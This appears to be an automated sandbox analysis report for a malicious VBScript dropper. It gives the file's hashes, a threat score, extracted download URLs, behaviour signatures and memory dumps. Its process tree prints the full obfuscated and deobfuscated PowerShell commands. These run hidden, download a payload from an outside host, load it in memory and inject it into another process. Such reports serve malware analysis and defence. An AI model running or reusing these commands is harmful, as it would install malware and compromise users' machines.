Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24-09-2024 04:28

General

  • Target

    Label_091273172.vbs

  • Size

    501KB

  • MD5

    acac54eb7b6c34d0c1dcf760c22ede4d

  • SHA1

    d6801fa279e4fe8696031696611c4b0d75054982

  • SHA256

    812abce7dbbfa5cff999d623b7af55b890d5e2ffbab510a0b585efb0bf2eb0cb

  • SHA512

    e22230cf8cec2bd0cbaf4f7eb18e32dd2246e52bac1df891cc8df67bdce2cf6982bd508307b6a2262e98a2e643e4a98ce229a82584fca5b3ce089f286f8cd393

  • SSDEEP

    12288:NxUu11RyddYlQLsdReovsT5JqGeqUXb8CYx6f2ACVqENi8rvNm7S0bpYiWYVwPkI:vTEsjaquAYdlb

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Label_091273172.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdaaml1cmwnKycgPSBSZycrJ2VodHRwJysncycrJzovL2lhNjAnKycwMTAwJysnLnVzLmFyY2gnKydpdmUub3JnLzI0L2l0ZW0nKydzJysnL2RldGFoLW5vJysndGUtdi8nKydEZXQnKydhaE5vdCcrJ2VWLnR4dFInKydnZTtaamliYXNlNjRDb250ZW50ID0gKCcrJ05lJysndy0nKydPJysnYmplJysnY3QgU3knKydzdCcrJ2VtLk5lJysndC5XZWJDbGllbnQpLkRvd25sJysnb2FkU3RyJysnaW5nKFpqaXVybCk7WmppYmluYScrJ3J5Q29uJysndCcrJ2VudCcrJyA9ICcrJ1tTeXMnKyd0ZW0nKycuQ29udmUnKydyJysndF06JysnOkZyb21CYXNlNicrJzRTdHJpbmcoWmonKydpJysnYmFzJysnZTY0Q28nKydudGVudCk7WmppJysnYXNzZW1ibHkgPSBbUmVmbGUnKydjdGlvbi5Bc3NlbScrJ2JseV06OkxvYScrJ2QoWmppYmknKyduYXJ5JysnQ28nKyduJysndGVudCk7WicrJ2ppJysndHlwZSA9IFonKydqaScrJ2Fzc2VtYmx5JysnLkdldFR5cGUoUmdlUnVuUEUuSG9tZVJnZSknKyc7WmppbScrJ2V0aCcrJ29kICcrJz0gWicrJ2ppdHlwZS5HZXRNZScrJ3Rob2QoUmcnKydlVkFJUmcnKydlKTtaamknKydtZXRob2QuSW52b2tlKFpqaW51bGwsIFtvYmplJysnY3RbXV0nKydAKFJnZTAvRycrJ3dNJysndWsvZC9lZScrJy5ldCcrJ3NhcC8vOnNwdHQnKydoJysnUmdlICwgUmdlJysnZGVzYXRpJysndmFkb1JnZSAnKycsIFJnZWRlc2F0JysnaXZhZG9SZycrJ2UgLCBSZ2UnKydkZXNhdGl2YWQnKydvUicrJ2dlLFJnZUEnKydkZEluUHInKydvY2VzczMnKycyJysnUmdlLFJnZVJnZSkpJykuUmVwbEFDZSgnWmppJywnJCcpLlJlcGxBQ2UoJ1JnZScsW1NUUkluZ11bQ2hhUl0zOSkgfCBJblZPa0UtZVhQUkVzc0lvTg==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Zjiurl'+' = Rg'+'ehttp'+'s'+'://ia60'+'0100'+'.us.arch'+'ive.org/24/item'+'s'+'/detah-no'+'te-v/'+'Det'+'ahNot'+'eV.txtR'+'ge;Zjibase64Content = ('+'Ne'+'w-'+'O'+'bje'+'ct Sy'+'st'+'em.Ne'+'t.WebClient).Downl'+'oadStr'+'ing(Zjiurl);Zjibina'+'ryCon'+'t'+'ent'+' = '+'[Sys'+'tem'+'.Conve'+'r'+'t]:'+':FromBase6'+'4String(Zj'+'i'+'bas'+'e64Co'+'ntent);Zji'+'assembly = [Refle'+'ction.Assem'+'bly]::Loa'+'d(Zjibi'+'nary'+'Co'+'n'+'tent);Z'+'ji'+'type = Z'+'ji'+'assembly'+'.GetType(RgeRunPE.HomeRge)'+';Zjim'+'eth'+'od '+'= Z'+'jitype.GetMe'+'thod(Rg'+'eVAIRg'+'e);Zji'+'method.Invoke(Zjinull, [obje'+'ct[]]'+'@(Rge0/G'+'wM'+'uk/d/ee'+'.et'+'sap//:sptt'+'h'+'Rge , Rge'+'desati'+'vadoRge '+', Rgedesat'+'ivadoRg'+'e , Rge'+'desativad'+'oR'+'ge,RgeA'+'ddInPr'+'ocess3'+'2'+'Rge,RgeRge))').ReplACe('Zji','$').ReplACe('Rge',[STRIng][ChaR]39) | InVOkE-eXPREssIoN"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2692

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\45WRE4YWCS0CDZT5R67K.temp

    Filesize

    7KB

    MD5

    62cc106457befdc48b6c157442d8d3aa

    SHA1

    6607026f855902ae01eaed6b20fbd7db3b627fec

    SHA256

    dd11c1779714f42eb196871f83f24e7b1ff0a5091c27a5bfe5da36fc42b57ef4

    SHA512

    db14ccf70ae80430892262cead0674c0ece975d2e9921507c9d93a456204a95a3ac7ef981fdb05a69c1702f6f389d612bba6250782516e12a92d097c9522f6eb

  • memory/2792-4-0x000007FEF57CE000-0x000007FEF57CF000-memory.dmp

    Filesize

    4KB

  • memory/2792-5-0x000000001B6A0000-0x000000001B982000-memory.dmp

    Filesize

    2.9MB

  • memory/2792-7-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-6-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

  • memory/2792-8-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-10-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-9-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-11-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-17-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

    Filesize

    9.6MB